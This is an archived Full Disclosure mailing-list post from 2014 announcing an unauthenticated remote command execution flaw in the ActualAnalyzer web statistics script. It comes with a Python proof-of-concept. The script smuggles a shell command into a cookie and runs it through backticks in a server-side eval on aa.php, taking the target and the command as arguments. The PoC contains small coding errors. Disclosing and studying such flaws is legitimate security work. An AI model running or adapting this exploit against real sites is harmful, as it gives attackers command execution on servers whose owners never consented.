[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Actual Analyzer Unauthenticated Command Execution

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] Actual Analyzer Unauthenticated Command Execution
From: "Benjamin Harris" <bch@xxxxxxx>
Date: Thu, 28 Aug 2014 00:21:26 +0100

Hi All

URL: http://www.actualscripts.com/products/analyzer/

I tried to report this a month ago, but got no response from the  
developers via the support form on their website, requesting a GPG 
key. This is an old vulnerability I found while dusting off some 
old hard drives. 

Latest still vulnerable.

Brief:
-------------------------

The most popular web statistics tools delivers one big flat list 
with statistics for any website. It is very easy in use but for 
websites with small amount of pages only. Besides are provided the 
primary opportunities for analyses of web site statistics only.


Details:
--------------------------

We control limited characters of an eval. Load commands into unused 
variable and use backticks to execute command in short space. 
Attached is a POC.

Pre-reqs are that you must know the domain of a website being 
tracked by this script.

Many thanks,
Ben

###############################
# ActualAnalyzer  exploit.
# Tested on Lite version 
# We load command into a dummy variable as we only have 6 characters to own the 
eval 
# but load more as first 2 characters get rm'd.
# We then execute the eval with backticks.
# 11/05/2011
##############################

import urllib
import urllib2
import sys
import time



def banner():
        print "     ____                        __              __              
    __                     "
        print "    / __/_  ______ _ ____ ______/ /___  ______ _/ /___ _____  
____ _/ /_  ______  ___  _____"
        print "   / /_/ / / / __ `// __ `/ ___/ __/ / / / __ `/ / __ `/ __ \/ 
__ `/ / / / /_  / / _ \/ ___/"
        print "  / __/ /_/ / /_/ // /_/ / /__/ /_/ /_/ / /_/ / / /_/ / / / / 
/_/ / / /_/ / / /_/  __/ /    "
        print " /_/  \__,_/\__, (_)__,_/\___/\__/\__,_/\__,_/_/\__,_/_/ 
/_/\__,_/_/\__, / /___/\___/_/     "
        print "              /_/                                                
  /____/                   "


def usage():
        print " [+] Usage:"
        print " [-] python " + sys.argv[0] + " -h vulnHOST -d analyticdomain -c 
\"command\""
        print " [-] python fuq.actualanalyzer.py -h test.com/lite -d 
analyticdomain -c \"touch /tmp/123\""

banner()
if len(sys.argv) < 6:
        usage()
        quit()
domain = sys.argv[2]
command = sys.argv[6]
host = syst.argv[4]

def commandexploit(domain,host,command):
        url = 'http://' + domain + '/aa.php?anp=' + host 
        data = None
        headers = {'Cookie': "ant=" + command + "; anm=414.`$cot`"}
        exploit1 = urllib2.Request(url,data,headers)
        exploit2 = urllib2.urlopen(exploit1)

commandexploit(domain,host,command)

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] XRMS SQLi to RCE 0day
Next by Date: [FD] Aerohive Hive Manager and Hive OS Multiple Vulnerabilities
Previous by thread: [FD] XRMS SQLi to RCE 0day
Next by thread: [FD] Aerohive Hive Manager and Hive OS Multiple Vulnerabilities
Index(es):
- Date
- Thread